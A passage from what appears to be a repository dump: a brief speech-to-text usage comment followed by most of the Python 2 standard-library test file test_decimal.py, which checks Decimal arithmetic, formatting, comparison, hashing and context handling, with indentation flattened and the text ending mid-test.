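#   ...                              # speak into the microphone
#   print(s2t.get_last_message())
#   s2t.cleanup()                    # stops the listener and writes message_history.json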
|
test_decimal.py
|
# Copyright (c) 2004 Python Software Foundation.
# All rights reserved.
# Written by Eric Price <eprice at tjhsst.edu>
# and Facundo Batista <facundo at taniquetil.com.ar>
# and Raymond Hettinger <python at rcn.com>
# and Aahz (aahz at pobox.com)
# and Tim Peters
"""
These are the test cases for the Decimal module.
There are two groups of tests, Arithmetic and Behaviour. The former test
the Decimal arithmetic using the tests provided by Mike Cowlishaw. The latter
test the pythonic behaviour according to PEP 327.
Cowlishaw's tests can be downloaded from:
www2.hursley.ibm.com/decimal/dectest.zip
This test module can be called from command line with one parameter (Arithmetic
or Behaviour) to test each part, or without parameter to test both parts. If
you're working through IDLE, you can import this test module and call test_main()
with the corresponding argument.
"""
import glob
import math
import os, sys
import pickle, copy
import unittest
from decimal import *
import numbers
from test.test_support import (TestSkipped, run_unittest, run_doctest,
is_resource_enabled)
import random
try:
import threading
except ImportError:
threading = None
# Useful Test Constant
Signals = getcontext().flags.keys()
# Tests are built around these assumed context defaults.
# test_main() restores the original context.
def init():
global ORIGINAL_CONTEXT
ORIGINAL_CONTEXT = getcontext().copy()
DefaultTestContext = Context(
prec = 9,
rounding = ROUND_HALF_EVEN,
traps = dict.fromkeys(Signals, 0)
)
setcontext(DefaultTestContext)
TESTDATADIR = 'decimaltestdata'
if __name__ == '__main__':
file = sys.argv[0]
else:
file = __file__
testdir = os.path.dirname(file) or os.curdir
directory = testdir + os.sep + TESTDATADIR + os.sep
skip_expected = not os.path.isdir(directory)
# Make sure it actually raises errors when not expected and caught in flags
# Slower, since it runs some things several times.
EXTENDEDERRORTEST = False
#Map the test cases' error names to the actual errors
ErrorNames = {'clamped' : Clamped,
'conversion_syntax' : InvalidOperation,
'division_by_zero' : DivisionByZero,
'division_impossible' : InvalidOperation,
'division_undefined' : InvalidOperation,
'inexact' : Inexact,
'invalid_context' : InvalidOperation,
'invalid_operation' : InvalidOperation,
'overflow' : Overflow,
'rounded' : Rounded,
'subnormal' : Subnormal,
'underflow' : Underflow}
def Nonfunction(*args):
"""Doesn't do anything."""
return None
RoundingDict = {'ceiling' : ROUND_CEILING, #Maps test-case names to roundings.
'down' : ROUND_DOWN,
'floor' : ROUND_FLOOR,
'half_down' : ROUND_HALF_DOWN,
'half_even' : ROUND_HALF_EVEN,
'half_up' : ROUND_HALF_UP,
'up' : ROUND_UP,
'05up' : ROUND_05UP}
# Name adapter to be able to change the Decimal and Context
# interface without changing the test files from Cowlishaw
nameAdapter = {'and':'logical_and',
'apply':'_apply',
'class':'number_class',
'comparesig':'compare_signal',
'comparetotal':'compare_total',
'comparetotmag':'compare_total_mag',
'copy':'copy_decimal',
'copyabs':'copy_abs',
'copynegate':'copy_negate',
'copysign':'copy_sign',
'divideint':'divide_int',
'invert':'logical_invert',
'iscanonical':'is_canonical',
'isfinite':'is_finite',
'isinfinite':'is_infinite',
'isnan':'is_nan',
'isnormal':'is_normal',
'isqnan':'is_qnan',
'issigned':'is_signed',
'issnan':'is_snan',
'issubnormal':'is_subnormal',
'iszero':'is_zero',
'maxmag':'max_mag',
'minmag':'min_mag',
'nextminus':'next_minus',
'nextplus':'next_plus',
'nexttoward':'next_toward',
'or':'logical_or',
'reduce':'normalize',
'remaindernear':'remainder_near',
'samequantum':'same_quantum',
'squareroot':'sqrt',
'toeng':'to_eng_string',
'tointegral':'to_integral_value',
'tointegralx':'to_integral_exact',
'tosci':'to_sci_string',
'xor':'logical_xor',
}
# The following functions return True/False rather than a Decimal instance
LOGICAL_FUNCTIONS = (
'is_canonical',
'is_finite',
'is_infinite',
'is_nan',
'is_normal',
'is_qnan',
'is_signed',
'is_snan',
'is_subnormal',
'is_zero',
'same_quantum',
)
# For some operations (currently exp, ln, log10, power), the decNumber
# reference implementation imposes additional restrictions on the
# context and operands. These restrictions are not part of the
# specification; however, the effect of these restrictions does show
# up in some of the testcases. We skip testcases that violate these
# restrictions, since Decimal behaves differently from decNumber for
# these testcases so these testcases would otherwise fail.
decNumberRestricted = ('power', 'ln', 'log10', 'exp')
DEC_MAX_MATH = 999999
def outside_decNumber_bounds(v, context):
if (context.prec > DEC_MAX_MATH or
context.Emax > DEC_MAX_MATH or
-context.Emin > DEC_MAX_MATH):
return True
if not v._is_special and v and (
v.adjusted() > DEC_MAX_MATH or
v.adjusted() < 1-2*DEC_MAX_MATH):
return True
return False
class DecimalTest(unittest.TestCase):
"""Class which tests the Decimal class against the test cases.
Changed for unittest.
"""
def setUp(self):
self.context = Context()
self.ignore_list = ['#']
# Basically, a # means return NaN InvalidOperation.
# Different from a sNaN in trim
self.ChangeDict = {'precision' : self.change_precision,
'rounding' : self.change_rounding_method,
'maxexponent' : self.change_max_exponent,
'minexponent' : self.change_min_exponent,
'clamp' : self.change_clamp}
def eval_file(self, file):
global skip_expected
if skip_expected:
raise TestSkipped
return
for line in open(file).xreadlines():
line = line.replace('\r\n', '').replace('\n', '')
#print line
try:
t = self.eval_line(line)
except DecimalException, exception:
#Exception raised where there shouldn't have been one.
self.fail('Exception "'+exception.__class__.__name__ + '" raised on line '+line)
return
def eval_line(self, s):
if s.find(' -> ') >= 0 and s[:2] != '--' and not s.startswith(' --'):
s = (s.split('->')[0] + '->' +
s.split('->')[1].split('--')[0]).strip()
else:
s = s.split('--')[0].strip()
for ignore in self.ignore_list:
if s.find(ignore) >= 0:
#print s.split()[0], 'NotImplemented--', ignore
return
if not s:
return
elif ':' in s:
return self.eval_directive(s)
else:
return self.eval_equation(s)
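# For reference, the .decTest files mix directives and test equations, e.g.
#   precision: 9
#   addx001 add 1 1 -> 2
# eval_directive() handles the former, eval_equation() the latter.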
def eval_directive(self, s):
funct, value = map(lambda x: x.strip().lower(), s.split(':'))
if funct == 'rounding':
value = RoundingDict[value]
else:
try:
value = int(value)
except ValueError:
pass
funct = self.ChangeDict.get(funct, Nonfunction)
funct(value)
def eval_equation(self, s):
#global DEFAULT_PRECISION
#print DEFAULT_PRECISION
if not TEST_ALL and random.random() < 0.90:
return
try:
Sides = s.split('->')
L = Sides[0].strip().split()
id = L[0]
if DEBUG:
print "Test ", id,
funct = L[1].lower()
valstemp = L[2:]
L = Sides[1].strip().split()
ans = L[0]
exceptions = L[1:]
except (TypeError, AttributeError, IndexError):
raise InvalidOperation
def FixQuotes(val):
val = val.replace("''", 'SingleQuote').replace('""', 'DoubleQuote')
val = val.replace("'", '').replace('"', '')
val = val.replace('SingleQuote', "'").replace('DoubleQuote', '"')
return val
fname = nameAdapter.get(funct, funct)
if fname == 'rescale':
return
funct = getattr(self.context, fname)
vals = []
conglomerate = ''
quote = 0
theirexceptions = [ErrorNames[x.lower()] for x in exceptions]
for exception in Signals:
self.context.traps[exception] = 1 #Catch these bugs...
for exception in theirexceptions:
self.context.traps[exception] = 0
for i, val in enumerate(valstemp):
if val.count("'") % 2 == 1:
quote = 1 - quote
if quote:
conglomerate = conglomerate + ' ' + val
continue
else:
val = conglomerate + val
conglomerate = ''
v = FixQuotes(val)
if fname in ('to_sci_string', 'to_eng_string'):
if EXTENDEDERRORTEST:
for error in theirexceptions:
self.context.traps[error] = 1
try:
funct(self.context.create_decimal(v))
except error:
pass
except Signals, e:
self.fail("Raised %s in %s when %s disabled" % \
(e, s, error))
else:
self.fail("Did not raise %s in %s" % (error, s))
self.context.traps[error] = 0
v = self.context.create_decimal(v)
else:
v = Decimal(v, self.context)
vals.append(v)
ans = FixQuotes(ans)
# skip tests that are related to bounds imposed in the decNumber
# reference implementation
if fname in decNumberRestricted:
if fname == 'power':
if not (vals[1]._isinteger() and
-1999999997 <= vals[1] <= 999999999):
if outside_decNumber_bounds(vals[0], self.context) or \
outside_decNumber_bounds(vals[1], self.context):
#print "Skipping test %s" % s
return
else:
if outside_decNumber_bounds(vals[0], self.context):
#print "Skipping test %s" % s
return
if EXTENDEDERRORTEST and fname not in ('to_sci_string', 'to_eng_string'):
for error in theirexceptions:
self.context.traps[error] = 1
try:
funct(*vals)
except error:
pass
except Signals, e:
self.fail("Raised %s in %s when %s disabled" % \
(e, s, error))
else:
self.fail("Did not raise %s in %s" % (error, s))
self.context.traps[error] = 0
if DEBUG:
print "--", self.context
try:
result = str(funct(*vals))
if fname in LOGICAL_FUNCTIONS:
result = str(int(eval(result))) # 'True', 'False' -> '1', '0'
except Signals, error:
self.fail("Raised %s in %s" % (error, s))
except: #Catch any error long enough to state the test case.
print "ERROR:", s
raise
myexceptions = self.getexceptions()
self.context.clear_flags()
myexceptions.sort()
theirexceptions.sort()
self.assertEqual(result, ans,
'Incorrect answer for ' + s + ' -- got ' + result)
self.assertEqual(myexceptions, theirexceptions,
'Incorrect flags set in ' + s + ' -- got ' + str(myexceptions))
return
def getexceptions(self):
return [e for e in Signals if self.context.flags[e]]
def change_precision(self, prec):
self.context.prec = prec
def change_rounding_method(self, rounding):
self.context.rounding = rounding
def change_min_exponent(self, exp):
self.context.Emin = exp
def change_max_exponent(self, exp):
self.context.Emax = exp
def change_clamp(self, clamp):
self.context._clamp = clamp
# The following classes test the behaviour of Decimal according to PEP 327
class DecimalExplicitConstructionTest(unittest.TestCase):
'''Unit tests for Explicit Construction cases of Decimal.'''
def test_explicit_empty(self):
self.assertEqual(Decimal(), Decimal("0"))
def test_explicit_from_None(self):
self.assertRaises(TypeError, Decimal, None)
def test_explicit_from_int(self):
#positive
d = Decimal(45)
self.assertEqual(str(d), '45')
#very large positive
d = Decimal(500000123)
self.assertEqual(str(d), '500000123')
#negative
d = Decimal(-45)
self.assertEqual(str(d), '-45')
#zero
d = Decimal(0)
self.assertEqual(str(d), '0')
def test_explicit_from_string(self):
#empty
self.assertEqual(str(Decimal('')), 'NaN')
#int
self.assertEqual(str(Decimal('45')), '45')
#float
self.assertEqual(str(Decimal('45.34')), '45.34')
#engineer notation
self.assertEqual(str(Decimal('45e2')), '4.5E+3')
#just not a number
self.assertEqual(str(Decimal('ugly')), 'NaN')
#leading and trailing whitespace permitted
self.assertEqual(str(Decimal('1.3E4 \n')), '1.3E+4')
self.assertEqual(str(Decimal(' -7.89')), '-7.89')
#unicode strings should be permitted
self.assertEqual(str(Decimal(u'0E-017')), '0E-17')
self.assertEqual(str(Decimal(u'45')), '45')
self.assertEqual(str(Decimal(u'-Inf')), '-Infinity')
self.assertEqual(str(Decimal(u'NaN123')), 'NaN123')
#but alternate unicode digits should not
self.assertEqual(str(Decimal(u'\uff11')), 'NaN')
def test_explicit_from_tuples(self):
#zero
d = Decimal( (0, (0,), 0) )
self.assertEqual(str(d), '0')
#int
d = Decimal( (1, (4, 5), 0) )
self.assertEqual(str(d), '-45')
#float
d = Decimal( (0, (4, 5, 3, 4), -2) )
self.assertEqual(str(d), '45.34')
#weird
d = Decimal( (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) )
self.assertEqual(str(d), '-4.34913534E-17')
#wrong number of items
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 9, 1)) )
#bad sign
self.assertRaises(ValueError, Decimal, (8, (4, 3, 4, 9, 1), 2) )
self.assertRaises(ValueError, Decimal, (0., (4, 3, 4, 9, 1), 2) )
self.assertRaises(ValueError, Decimal, (Decimal(1), (4, 3, 4, 9, 1), 2))
#bad exp
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 9, 1), 'wrong!') )
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 9, 1), 0.) )
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 9, 1), '1') )
#bad coefficients
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, None, 1), 2) )
self.assertRaises(ValueError, Decimal, (1, (4, -3, 4, 9, 1), 2) )
self.assertRaises(ValueError, Decimal, (1, (4, 10, 4, 9, 1), 2) )
self.assertRaises(ValueError, Decimal, (1, (4, 3, 4, 'a', 1), 2) )
def test_explicit_from_Decimal(self):
#positive
d = Decimal(45)
e = Decimal(d)
self.assertEqual(str(e), '45')
self.assertNotEqual(id(d), id(e))
#very large positive
d = Decimal(500000123)
e = Decimal(d)
self.assertEqual(str(e), '500000123')
self.assertNotEqual(id(d), id(e))
#negative
d = Decimal(-45)
e = Decimal(d)
self.assertEqual(str(e), '-45')
self.assertNotEqual(id(d), id(e))
#zero
d = Decimal(0)
e = Decimal(d)
self.assertEqual(str(e), '0')
self.assertNotEqual(id(d), id(e))
def test_explicit_context_create_decimal(self):
nc = copy.copy(getcontext())
nc.prec = 3
# empty
d = Decimal()
self.assertEqual(str(d), '0')
d = nc.create_decimal()
self.assertEqual(str(d), '0')
# from None
self.assertRaises(TypeError, nc.create_decimal, None)
# from int
d = nc.create_decimal(456)
self.failUnless(isinstance(d, Decimal))
self.assertEqual(nc.create_decimal(45678),
nc.create_decimal('457E+2'))
# from string
d = Decimal('456789')
self.assertEqual(str(d), '456789')
d = nc.create_decimal('456789')
self.assertEqual(str(d), '4.57E+5')
# leading and trailing whitespace should result in a NaN;
# spaces are already checked in Cowlishaw's test-suite, so
# here we just check that a trailing newline results in a NaN
self.assertEqual(str(nc.create_decimal('3.14\n')), 'NaN')
# from tuples
d = Decimal( (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) )
self.assertEqual(str(d), '-4.34913534E-17')
d = nc.create_decimal( (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) )
self.assertEqual(str(d), '-4.35E-17')
# from Decimal
prevdec = Decimal(500000123)
d = Decimal(prevdec)
self.assertEqual(str(d), '500000123')
d = nc.create_decimal(prevdec)
self.assertEqual(str(d), '5.00E+8')
class DecimalImplicitConstructionTest(unittest.TestCase):
'''Unit tests for Implicit Construction cases of Decimal.'''
def test_implicit_from_None(self):
self.assertRaises(TypeError, eval, 'Decimal(5) + None', globals())
def test_implicit_from_int(self):
#normal
self.assertEqual(str(Decimal(5) + 45), '50')
#exceeding precision
self.assertEqual(Decimal(5) + 123456789000, Decimal(123456789000))
def test_implicit_from_string(self):
self.assertRaises(TypeError, eval, 'Decimal(5) + "3"', globals())
def test_implicit_from_float(self):
self.assertRaises(TypeError, eval, 'Decimal(5) + 2.2', globals())
def test_implicit_from_Decimal(self):
self.assertEqual(Decimal(5) + Decimal(45), Decimal(50))
def test_rop(self):
# Allow other classes to be trained to interact with Decimals
class E:
def __divmod__(self, other):
return 'divmod ' + str(other)
def __rdivmod__(self, other):
return str(other) + ' rdivmod'
def __lt__(self, other):
return 'lt ' + str(other)
def __gt__(self, other):
return 'gt ' + str(other)
def __le__(self, other):
return 'le ' + str(other)
def __ge__(self, other):
return 'ge ' + str(other)
def __eq__(self, other):
return 'eq ' + str(other)
def __ne__(self, other):
return 'ne ' + str(other)
self.assertEqual(divmod(E(), Decimal(10)), 'divmod 10')
self.assertEqual(divmod(Decimal(10), E()), '10 rdivmod')
self.assertEqual(eval('Decimal(10) < E()'), 'gt 10')
self.assertEqual(eval('Decimal(10) > E()'), 'lt 10')
self.assertEqual(eval('Decimal(10) <= E()'), 'ge 10')
self.assertEqual(eval('Decimal(10) >= E()'), 'le 10')
self.assertEqual(eval('Decimal(10) == E()'), 'eq 10')
self.assertEqual(eval('Decimal(10) != E()'), 'ne 10')
# insert operator methods and then exercise them
oplist = [
('+', '__add__', '__radd__'),
('-', '__sub__', '__rsub__'),
('*', '__mul__', '__rmul__'),
('%', '__mod__', '__rmod__'),
('//', '__floordiv__', '__rfloordiv__'),
('**', '__pow__', '__rpow__')
]
if 1/2 == 0:
# testing with classic division, so add __div__
oplist.append(('/', '__div__', '__rdiv__'))
else:
# testing with -Qnew, so add __truediv__
oplist.append(('/', '__truediv__', '__rtruediv__'))
for sym, lop, rop in oplist:
setattr(E, lop, lambda self, other: 'str' + lop + str(other))
setattr(E, rop, lambda self, other: str(other) + rop + 'str')
self.assertEqual(eval('E()' + sym + 'Decimal(10)'),
'str' + lop + '10')
self.assertEqual(eval('Decimal(10)' + sym + 'E()'),
'10' + rop + 'str')
class DecimalFormatTest(unittest.TestCase):
'''Unit tests for the format function.'''
def test_formatting(self):
# triples giving a format, a Decimal, and the expected result
test_values = [
('e', '0E-15', '0e-15'),
('e', '2.3E-15', '2.3e-15'),
('e', '2.30E+2', '2.30e+2'), # preserve significant zeros
('e', '2.30000E-15', '2.30000e-15'),
('e', '1.23456789123456789e40', '1.23456789123456789e+40'),
('e', '1.5', '1.5e+0'),
('e', '0.15', '1.5e-1'),
('e', '0.015', '1.5e-2'),
('e', '0.0000000000015', '1.5e-12'),
('e', '15.0', '1.50e+1'),
('e', '-15', '-1.5e+1'),
('e', '0', '0e+0'),
('e', '0E1', '0e+1'),
('e', '0.0', '0e-1'),
('e', '0.00', '0e-2'),
('.6e', '0E-15', '0.000000e-9'),
('.6e', '0', '0.000000e+6'),
('.6e', '9.999999', '9.999999e+0'),
('.6e', '9.9999999', '1.000000e+1'),
('.6e', '-1.23e5', '-1.230000e+5'),
('.6e', '1.23456789e-3', '1.234568e-3'),
('f', '0', '0'),
('f', '0.0', '0.0'),
('f', '0E-2', '0.00'),
('f', '0.00E-8', '0.0000000000'),
('f', '0E1', '0'), # loses exponent information
('f', '3.2E1', '32'),
('f', '3.2E2', '320'),
('f', '3.20E2', '320'),
('f', '3.200E2', '320.0'),
('f', '3.2E-6', '0.0000032'),
('.6f', '0E-15', '0.000000'), # all zeros treated equally
('.6f', '0E1', '0.000000'),
('.6f', '0', '0.000000'),
('.0f', '0', '0'), # no decimal point
('.0f', '0e-2', '0'),
('.0f', '3.14159265', '3'),
('.1f', '3.14159265', '3.1'),
('.4f', '3.14159265', '3.1416'),
('.6f', '3.14159265', '3.141593'),
('.7f', '3.14159265', '3.1415926'), # round-half-even!
('.8f', '3.14159265', '3.14159265'),
('.9f', '3.14159265', '3.141592650'),
('g', '0', '0'),
('g', '0.0', '0.0'),
('g', '0E1', '0e+1'),
('G', '0E1', '0E+1'),
('g', '0E-5', '0.00000'),
('g', '0E-6', '0.000000'),
('g', '0E-7', '0e-7'),
('g', '-0E2', '-0e+2'),
('.0g', '3.14159265', '3'), # 0 sig fig -> 1 sig fig
('.1g', '3.14159265', '3'),
('.2g', '3.14159265', '3.1'),
('.5g', '3.14159265', '3.1416'),
('.7g', '3.14159265', '3.141593'),
('.8g', '3.14159265', '3.1415926'), # round-half-even!
('.9g', '3.14159265', '3.14159265'),
('.10g', '3.14159265', '3.14159265'), # don't pad
('%', '0E1', '0%'),
('%', '0E0', '0%'),
('%', '0E-1', '0%'),
('%', '0E-2', '0%'),
('%', '0E-3', '0.0%'),
('%', '0E-4', '0.00%'),
('.3%', '0', '0.000%'), # all zeros treated equally
('.3%', '0E10', '0.000%'),
('.3%', '0E-10', '0.000%'),
('.3%', '2.34', '234.000%'),
('.3%', '1.234567', '123.457%'),
('.0%', '1.23', '123%'),
('e', 'NaN', 'NaN'),
('f', '-NaN123', '-NaN123'),
('+g', 'NaN456', '+NaN456'),
('.3e', 'Inf', 'Infinity'),
('.16f', '-Inf', '-Infinity'),
('.0g', '-sNaN', '-sNaN'),
('', '1.00', '1.00'),
# check alignment
('<6', '123', '123 '),
('>6', '123', ' 123'),
('^6', '123', ' 123 '),
('=+6', '123', '+ 123'),
]
for fmt, d, result in test_values:
self.assertEqual(format(Decimal(d), fmt), result)
class DecimalArithmeticOperatorsTest(unittest.TestCase):
'''Unit tests for all arithmetic operators, binary and unary.'''
def test_addition(self):
d1 = Decimal('-11.1')
d2 = Decimal('22.2')
#two Decimals
self.assertEqual(d1+d2, Decimal('11.1'))
self.assertEqual(d2+d1, Decimal('11.1'))
#with other type, left
c = d1 + 5
self.assertEqual(c, Decimal('-6.1'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 5 + d1
self.assertEqual(c, Decimal('-6.1'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 += d2
self.assertEqual(d1, Decimal('11.1'))
#inline with other type
d1 += 5
self.assertEqual(d1, Decimal('16.1'))
def test_subtraction(self):
d1 = Decimal('-11.1')
d2 = Decimal('22.2')
#two Decimals
self.assertEqual(d1-d2, Decimal('-33.3'))
self.assertEqual(d2-d1, Decimal('33.3'))
#with other type, left
c = d1 - 5
self.assertEqual(c, Decimal('-16.1'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 5 - d1
self.assertEqual(c, Decimal('16.1'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 -= d2
self.assertEqual(d1, Decimal('-33.3'))
#inline with other type
d1 -= 5
self.assertEqual(d1, Decimal('-38.3'))
def test_multiplication(self):
d1 = Decimal('-5')
d2 = Decimal('3')
#two Decimals
self.assertEqual(d1*d2, Decimal('-15'))
self.assertEqual(d2*d1, Decimal('-15'))
#with other type, left
c = d1 * 5
self.assertEqual(c, Decimal('-25'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 5 * d1
self.assertEqual(c, Decimal('-25'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 *= d2
self.assertEqual(d1, Decimal('-15'))
#inline with other type
d1 *= 5
self.assertEqual(d1, Decimal('-75'))
def test_division(self):
d1 = Decimal('-5')
d2 = Decimal('2')
#two Decimals
self.assertEqual(d1/d2, Decimal('-2.5'))
self.assertEqual(d2/d1, Decimal('-0.4'))
#with other type, left
c = d1 / 4
self.assertEqual(c, Decimal('-1.25'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 4 / d1
self.assertEqual(c, Decimal('-0.8'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 /= d2
self.assertEqual(d1, Decimal('-2.5'))
#inline with other type
d1 /= 4
self.assertEqual(d1, Decimal('-0.625'))
def test_floor_division(self):
d1 = Decimal('5')
d2 = Decimal('2')
#two Decimals
self.assertEqual(d1//d2, Decimal('2'))
self.assertEqual(d2//d1, Decimal('0'))
#with other type, left
c = d1 // 4
self.assertEqual(c, Decimal('1'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 7 // d1
self.assertEqual(c, Decimal('1'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 //= d2
self.assertEqual(d1, Decimal('2'))
#inline with other type
d1 //= 2
self.assertEqual(d1, Decimal('1'))
def test_powering(self):
d1 = Decimal('5')
d2 = Decimal('2')
#two Decimals
self.assertEqual(d1**d2, Decimal('25'))
self.assertEqual(d2**d1, Decimal('32'))
#with other type, left
c = d1 ** 4
self.assertEqual(c, Decimal('625'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 7 ** d1
self.assertEqual(c, Decimal('16807'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 **= d2
self.assertEqual(d1, Decimal('25'))
#inline with other type
d1 **= 4
self.assertEqual(d1, Decimal('390625'))
def test_module(self):
d1 = Decimal('5')
d2 = Decimal('2')
#two Decimals
self.assertEqual(d1%d2, Decimal('1'))
self.assertEqual(d2%d1, Decimal('2'))
#with other type, left
c = d1 % 4
self.assertEqual(c, Decimal('1'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 7 % d1
self.assertEqual(c, Decimal('2'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 %= d2
self.assertEqual(d1, Decimal('1'))
#inline with other type
d1 %= 4
self.assertEqual(d1, Decimal('1'))
def test_floor_div_module(self):
d1 = Decimal('5')
d2 = Decimal('2')
#two Decimals
(p, q) = divmod(d1, d2)
self.assertEqual(p, Decimal('2'))
self.assertEqual(q, Decimal('1'))
self.assertEqual(type(p), type(d1))
self.assertEqual(type(q), type(d1))
#with other type, left
(p, q) = divmod(d1, 4)
self.assertEqual(p, Decimal('1'))
self.assertEqual(q, Decimal('1'))
self.assertEqual(type(p), type(d1))
self.assertEqual(type(q), type(d1))
#with other type, right
(p, q) = divmod(7, d1)
self.assertEqual(p, Decimal('1'))
self.assertEqual(q, Decimal('2'))
self.assertEqual(type(p), type(d1))
self.assertEqual(type(q), type(d1))
def test_unary_operators(self):
self.assertEqual(+Decimal(45), Decimal(+45)) # +
self.assertEqual(-Decimal(45), Decimal(-45)) # -
self.assertEqual(abs(Decimal(45)), abs(Decimal(-45))) # abs
def test_nan_comparisons(self):
n = Decimal('NaN')
s = Decimal('sNaN')
i = Decimal('Inf')
f = Decimal('2')
for x, y in [(n, n), (n, i), (i, n), (n, f), (f, n),
(s, n), (n, s), (s, i), (i, s), (s, f), (f, s), (s, s)]:
self.assert_(x != y)
self.assert_(not (x == y))
self.assert_(not (x < y))
self.assert_(not (x <= y))
self.assert_(not (x > y))
self.assert_(not (x >= y))
# The following are two functions used to test threading in the next class
def thfunc1(cls):
d1 = Decimal(1)
d3 = Decimal(3)
test1 = d1/d3
cls.synchro.wait()
test2 = d1/d3
cls.finish1.set()
cls.assertEqual(test1, Decimal('0.3333333333333333333333333333'))
cls.assertEqual(test2, Decimal('0.3333333333333333333333333333'))
return
def thfunc2(cls):
d1 = Decimal(1)
d3 = Decimal(3)
test1 = d1/d3
thiscontext = getcontext()
thiscontext.prec = 18
test2 = d1/d3
cls.synchro.set()
cls.finish2.set()
cls.assertEqual(test1, Decimal('0.3333333333333333333333333333'))
cls.assertEqual(test2, Decimal('0.333333333333333333'))
return
class DecimalUseOfContextTest(unittest.TestCase):
'''Unit tests for Use of Context cases in Decimal.'''
try:
import threading
except ImportError:
threading = None
# Take care executing this test from IDLE, there's an issue in threading
# that hangs IDLE and I couldn't find it
def test_threading(self):
#Test the "threading isolation" of a Context.
self.synchro = threading.Event()
self.finish1 = threading.Event()
self.finish2 = threading.Event()
th1 = threading.Thread(target=thfunc1, args=(self,))
th2 = threading.Thread(target=thfunc2, args=(self,))
th1.start()
th2.start()
self.finish1.wait()
self.finish2.wait()
return
if threading is None:
del test_threading
class DecimalUsabilityTest(unittest.TestCase):
'''Unit tests for Usability cases of Decimal.'''
def test_comparison_operators(self):
da = Decimal('23.42')
db = Decimal('23.42')
dc = Decimal('45')
#two Decimals
self.failUnless(dc > da)
self.failUnless(dc >= da)
self.failUnless(da < dc)
self.failUnless(da <= dc)
self.failUnless(da == db)
self.failUnless(da != dc)
self.failUnless(da <= db)
self.failUnless(da >= db)
self.assertEqual(cmp(dc,da), 1)
self.assertEqual(cmp(da,dc), -1)
self.assertEqual(cmp(da,db), 0)
#a Decimal and an int
self.failUnless(dc > 23)
self.failUnless(23 < dc)
self.failUnless(dc == 45)
self.assertEqual(cmp(dc,23), 1)
self.assertEqual(cmp(23,dc), -1)
self.assertEqual(cmp(dc,45), 0)
#a Decimal and uncomparable
self.assertNotEqual(da, 'ugly')
self.assertNotEqual(da, 32.7)
self.assertNotEqual(da, object())
self.assertNotEqual(da, object)
# sortable
a = map(Decimal, xrange(100))
b = a[:]
random.shuffle(a)
a.sort()
self.assertEqual(a, b)
# with None
self.assertFalse(Decimal(1) < None)
self.assertTrue(Decimal(1) > None)
def test_copy_and_deepcopy_methods(self):
d = Decimal('43.24')
c = copy.copy(d)
self.assertEqual(id(c), id(d))
dc = copy.deepcopy(d)
self.assertEqual(id(dc), id(d))
def test_hash_method(self):
#just that it's hashable
hash(Decimal(23))
test_values = [Decimal(sign*(2**m + n))
for m in [0, 14, 15, 16, 17, 30, 31,
32, 33, 62, 63, 64, 65, 66]
for n in range(-10, 10)
for sign in [-1, 1]]
test_values.extend([
Decimal("-0"), # zeros
Decimal("0.00"),
Decimal("-0.000"),
Decimal("0E10"),
Decimal("-0E12"),
Decimal("10.0"), # negative exponent
Decimal("-23.00000"),
Decimal("1230E100"), # positive exponent
Decimal("-4.5678E50"),
# a value for which hash(n) != hash(n % (2**64-1))
# in Python pre-2.6
Decimal(2**64 + 2**32 - 1),
# selection of values which fail with the old (before
# version 2.6) long.__hash__
Decimal("1.634E100"),
Decimal("90.697E100"),
Decimal("188.83E100"),
Decimal("1652.9E100"),
Decimal("56531E100"),
])
# check that hash(d) == hash(int(d)) for integral values
for value in test_values:
self.assertEqual(hash(value), hash(int(value)))
#the same hash as for an int
self.assertEqual(hash(Decimal(23)), hash(23))
self.assertRaises(TypeError, hash, Decimal('NaN'))
self.assert_(hash(Decimal('Inf')))
self.assert_(hash(Decimal('-Inf')))
# check that the value of the hash doesn't depend on the
# current context (issue #1757)
c = getcontext()
old_precision = c.prec
x = Decimal("123456789.1")
c.prec = 6
h1 = hash(x)
c.prec = 10
h2 = hash(x)
c.prec = 16
h3 = hash(x)
self.assertEqual(h1, h2)
self.assertEqual(h1, h3)
c.prec = old_precision
def test_min_and_max_methods(self):
d1 = Decimal('15.32')
d2 = Decimal('28.5')
l1 = 15
l2 = 28
#between Decimals
self.failUnless(min(d1,d2) is d1)
self.failUnless(min(d2,d1) is d1)
self.failUnless(max(d1,d2) is d2)
self.failUnless(max(d2,d1) is d2)
#between Decimal and long
self.failUnless(min(d1,l2) is d1)
self.failUnless(min(l2,d1) is d1)
self.failUnless(max(l1,d2) is d2)
self.failUnless(max(d2,l1) is d2)
def test_as_nonzero(self):
#as false
self.failIf(Decimal(0))
#as true
self.failUnless(Decimal('0.372'))
def test_tostring_methods(self):
#Test str and repr methods.
d = Decimal('15.32')
self.assertEqual(str(d), '15.32') # str
self.assertEqual(repr(d), "Decimal('15.32')") # repr
# result type of string methods should be str, not unicode
unicode_inputs = [u'123.4', u'0.5E2', u'Infinity', u'sNaN',
u'-0.0E100', u'-NaN001', u'-Inf']
for u in unicode_inputs:
d = Decimal(u)
self.assertEqual(type(str(d)), str)
self.assertEqual(type(repr(d)), str)
self.assertEqual(type(d.to_eng_string()), str)
def test_tonum_methods(self):
#Test float, int and long methods.
d1 = Decimal('66')
d2 = Decimal('15.32')
#int
self.assertEqual(int(d1), 66)
self.assertEqual(int(d2), 15)
#long
self.assertEqual(long(d1), 66)
self.assertEqual(long(d2), 15)
#float
self.assertEqual(float(d1), 66)
self.assertEqual(float(d2), 15.32)
def test_eval_round_trip(self):
#with zero
